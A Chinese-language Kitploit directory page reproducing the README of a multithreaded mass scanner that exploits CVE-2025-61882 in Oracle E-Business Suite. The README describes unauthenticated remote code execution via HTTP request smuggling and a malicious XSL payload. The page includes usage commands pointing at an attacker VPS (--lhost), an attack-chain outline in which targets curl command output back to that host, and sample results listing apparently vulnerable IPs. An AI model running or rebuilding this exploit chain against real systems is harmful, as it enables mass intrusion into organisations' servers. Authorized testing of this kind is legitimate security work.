Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-61882 — 多线程扫描器,用于检测 Oracle E-Business Suite 中的 CVE-2025-61882,利用 HTTP 请求走私实现未认证远程代码执行,并通过命令输出来验证。 | Kitploit
工具/GitHubGitHub/sachinart/cve-2025-61882
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubsachinart/cve-2025-61882

CVE-2025-61882

多线程扫描器,用于检测 Oracle E-Business Suite 中的 CVE-2025-61882,利用 HTTP 请求走私实现未认证远程代码执行,并通过命令输出来验证。

查看仓库
117311个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Oracle E-Business Suite RCE 扫描器 (CVE-2025-61882)

一个快速、多线程的批量扫描器,用于检测 Oracle E-Business Suite 安装中的 CVE-2025-61882。该严重漏洞允许未经身份验证的远程代码执行。

Python Version License CVE

🎯 功能特性

  • 批量扫描 - 从文件中处理数百或数千个目标
  • 多线程 - 可配置的并发扫描(默认:20 个线程)
  • 自动检测 - 通过执行 id 命令并解析输出来验证 RCE
  • 实时结果 - 易受攻击的目标会立即写入 vuln-output.txt
  • 随机端口 - 为每个目标使用随机端口(2000-9999)以避免冲突
  • 简洁输出 - 进度跟踪,噪音最小化

📋 环境要求

root@kitploit:~
pip install requests

仅此而已。只需 Python 3.7+ 和 requests 库。

🚀 安装

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 使用方法

基本扫描

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

快速扫描(50 个线程)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

保守扫描(10 个线程)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 目标文件格式

创建一个 targets.txt 文件,每行一个 URL:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 输出示例

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE 扫描器 (CVE-2025-61882)        ║
╚═══════════════════════════════════════════════════════════════╝

[*] 从文件加载了 1235 个目标
[*] 使用 20 个并发线程运行
[*] 易受攻击的主机将保存到 vuln-output.txt

[*] [1/1235] 正在检查 https://target1.com:443 端口 7893
[*] [2/1235] 正在检查 https://target2.com:443 端口 5882

[+] 发现目标! 129.146.56.43 存在漏洞
[+] 命令输出: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] 扫描在 245.67 秒内完成
[*] 发现 3 个易受攻击的目标
[*] 查看 vuln-output.txt 获取完整结果
=================================================================

[+] 发现的易受攻击目标:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 输出文件

结果保存到 vuln-output.txt:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - 扫描结果
# 开始时间: Tue Oct 07 15:30:45 2025
# 目标总数: 1235
# 扫描器作者: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 工作原理

  1. CSRF 令牌获取 - 从目标获取有效的 CSRF 令牌
  2. HTTP 请求走私 - 利用走私漏洞注入恶意负载
  3. XSL 负载投递 - 提供执行命令的恶意 XSL 样式表
  4. 回调验证 - 目标执行 id 命令并通过 curl 将输出发送回来
  5. 正则匹配 - 通过检查 uid=...gid=... 模式来验证 RCE 是否成功

⚙️ 配置

🔒 负责任披露

此工具仅用于授权的安全测试。请始终:

  • ✅ 在测试前获得书面许可
  • ✅ 仅扫描您拥有或获得明确授权测试的系统
  • ✅ 负责任地向受影响组织报告发现
  • ✅ 遵循协调漏洞披露实践
  • ❌ 切勿在未经授权的系统上使用

未经授权访问计算机系统是违法的。

🐛 已知问题

  • 某些目标可能因防火墙/IDS 拦截而超时
  • 回调检测要求目标能够通过随机端口访问您的 VPS
  • SSL 证书警告被抑制(渗透测试中的预期行为)

🤝 贡献

发现 bug?有功能请求?

  1. Fork 该仓库
  2. 创建您的功能分支(git checkout -b feature/amazing-feature)
  3. 提交您的更改(git commit -m 'Add some feature')
  4. 推送到分支(git push origin feature/amazing-feature)
  5. 提交 Pull Request

📜 许可证

本项目采用 MIT 许可证授权 - 详情请参阅 LICENSE 文件。

⚠️ 免责声明

此工具仅供教育和授权安全测试目的使用。作者不对因使用此工具造成的任何滥用或损害负责。使用风险自负。

📚 参考

  • CVE-2025-61882 详情
  • Oracle 关键补丁更新

👨‍💻 由 Chirag Artani 开发

网站 • Twitter • LinkedIn

为信息安全社区用心制作 ❤️

下载工具
参数必需默认值描述
--targets是-包含目标 URL 的文件路径
--lhost是-您的 VPS/攻击者 IP 地址
--threads否20并发线程数